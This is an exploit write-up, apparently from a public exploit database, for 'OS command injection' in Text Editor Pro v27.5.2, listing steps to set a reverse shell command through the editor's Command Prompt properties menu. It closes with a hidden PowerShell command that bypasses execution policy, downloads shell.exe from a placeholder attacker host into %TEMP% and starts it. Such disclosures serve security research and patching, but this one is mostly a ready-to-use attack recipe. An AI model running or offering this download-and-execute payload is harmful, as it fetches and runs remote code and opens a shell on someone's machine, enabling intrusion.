Exploit Title: Text Editor Pro v27.5.2 - OS Command Injection

Discovered by: Ahmet Ümit BAYRAM

Discovered Date: 17.09.2023

Vendor Homepage: https://www.texteditor.pro

Software Link: https://www.texteditor.pro/downloads/TextEditorPro32.exe

Tested Version: v27.5.2 (latest)

Tested on: Windows 2019 Server 64bit

Steps to Reproduce

  1. Open Text Editor Pro.
  2. Click on the arrow to the right of Command Prompt in the top menu.
  3. Select Properties, then click on Insert.
  4. In the opened box, enter your reverse shell command and click OK.
  5. Save the configuration by clicking OK again.
  6. Click on the arrow to the right of Command Prompt again, and select your configured reverse shell command.
  7. Your reverse shell should now be active, connecting to your listener.

Example of Reverse Shell Command

To set up a reverse shell command, use the following example:

```batch powershell -NoP -NonI -W Hidden -Exec Bypass -Command “Invoke-WebRequest -Uri http://attacker_ip:port -OutFile %TEMP%\shell.exe; Start-Process %TEMP%\shell.exe”